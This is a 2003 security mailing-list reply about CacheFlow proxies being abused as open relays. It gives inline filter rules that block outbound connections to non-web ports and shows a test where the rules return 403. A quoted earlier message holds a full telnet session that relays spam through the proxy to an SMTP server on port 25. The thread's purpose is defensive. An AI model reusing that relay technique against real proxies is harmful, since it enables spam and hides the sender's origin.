'Re: Cacheflow proxy abuse (revisited)'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       incidents
Subject:    Re: Cacheflow proxy abuse (revisited)
From:       Tim Kennedy <tim () timkennedy ! net>
Date:       2003-09-12 15:19:44
[Download RAW message or body]


Alain,

If you make sure all 4 of these lines are in your inline filter,
it will block both the GET and POST methods of making outbound 
connections on a cacheflow.
--------------------------------------------------------------------------
        cacheflow#conf t
        cacheflow#(config)inline filter-list local ccc
        https://.*:(443|80) service=yes
        https://.*:[0-9]+/ service=no
        http://.*:(443|80) service=yes
        http://.*:[0-9]+/ service=no
        ccc
--------------------------------------------------------------------------
Sorry, I left the second two (http) lines out, in my original mail.

I left the log of the original telnet session at the bottom of this 
reply.  When I add these lines to the cacheflow, and try to GET or
POST to another server, on another port, I get:

--------------------------------------------------------------------------
memnoch[1075]# telnet 10.0.2.190 80
Trying 10.0.2.190...
Connected to 10.0.2.190.
Escape character is '^]'.
POST / HTTP/1.1
HOST: mail.yellowbrix.com:25
HELO .

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Pragma: no-cache
Content-Length:  2678
Content-Type: text/html
Connection: close
--------------------------------------------------------------------------

At least, it worked for me, and people have stopped relaying through 
our cacheflow.

-Tim

On Fri, 12 Sep 2003, Alain Fauconnet wrote:

> Hello,
> 
> Thanks for the info. That does prevent the CONNECT abuse, but not  the
> POST abuse, which can be used almost in the same way (although  a  bit
> more difficult) to use a Cachelfow to hide one's tracks when spamming.
> 
> Greets,
> _Alain_
>  
> > --------------------------------------------------------------------------
> > telnet ip.or.hostname.of.cacehflow 80
> > GET / HTTP/1.1
> > HOST: mailserver.victim.com:25
> > HELO .
> > mail from: spammer@alter.net
> > rcpt to: target@unsuspecting.com
> > DATA
> > Subject: Look Ma! I'm an open relay
> > HI, you've been spammed through an open proxy, because of a bug in the
> > OS code.  Have a Great Day!
> > -Spammer
> > .
> > 
> > 220 mailserver.victim.com ESMTP Sendmail 8.12.9/8.12.9; Wed, 10 Sep 2003 
> > 11:15:31 -0400
> > 500 5.5.1 Command unrecognized: "GET / HTTP/1.0"
> > 500 5.5.1 Command unrecognized: "HOST: memnoch.sugarat.net:25"
> > 250 mailserver.victim.com Hello CacheFlowServer@[xxx.x.x.xx], pleased to 
> > meet you
> > 250 2.1.0 spammer@alter.net... Sender ok
> > 250 2.1.5 target@unsuspecting.com... Recipient ok
> > 354 Enter mail, end with "." on a line by itself
> > 250 2.0.0 h8AFFVfo011729 Message accepted for delivery
> > 500 5.5.1 Command unrecognized: "Cache-Control: max-stale=0"
> > 500 5.5.1 Command unrecognized: "Connection: Keep-Alive"
> > 500 5.5.1 Command unrecognized: "Client-ip: xx.xx.x.xxx"
> > 500 5.5.1 Command unrecognized: ""
> > ^]
> > telnet> close
> > Connection closed.
> > 
> > --------------------------------------------------------------------------

---------------------------------------------------------------------------
Attend Black Hat Briefings & Training Federal, September 29-30 (Training), 
October 1-2 (Briefings) in Tysons Corner, VA; the world's premier 
technical IT security event.  Modeled after the famous Black Hat event in 
Las Vegas! 6 tracks, 12 training sessions, top speakers and sponsors.  
Symantec is the Diamond sponsor.  Early-bird registration ends September 6.Visit us: www.blackhat.com
----------------------------------------------------------------------------

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic